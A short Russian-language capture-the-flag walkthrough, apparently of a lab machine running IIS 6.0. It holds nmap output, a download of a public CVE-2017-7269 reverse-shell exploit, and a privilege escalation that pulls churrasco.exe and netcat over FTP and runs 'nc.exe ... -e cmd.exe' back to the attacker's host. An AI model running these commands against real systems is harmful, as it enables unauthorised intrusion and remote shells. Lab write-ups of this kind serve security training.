Обзор сервисов

Проверим сервисы на машине 10.10.10.14 с помощью nmap:

$ nmap -sV -sC -Pn -oN 10.10.10.14 10.10.10.14

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info:
|   Target_Name: GRANPA
|   NetBIOS_Domain_Name: GRANPA
|   NetBIOS_Computer_Name: GRANPA
|   DNS_Domain_Name: granpa
|   DNS_Computer_Name: granpa
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Date: Fri, 21 May 2021 09:12:06 GMT
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Для этой версии веб-сервера IIS 6.0 существует эксплоит, которым мы воспользуемся.

curl -L -o exp.py https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell
rlwrap -lnvp 1234

Alt text

Повышение привилегий

На локальной машине развернем FTP-сервер и добавим в него эксплоит churassco и netcat:

wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
python3 -m pyftpdlib -p 21
rlwrap nc -lnvp 1235

На удаленной машине подключимся к себе, скачаем эксплоит и неткат, затем запустим его:

> ftp -A 10.10.14.5
> binary
> get churrasco.exe
> get nc.exe
> bye
> churrasco.exe "nc.exe 10.10.14.5 1235 -e cmd.exe"

Alt text

Флаг пользователя

Alt text

Флаг суперпользователя

Alt text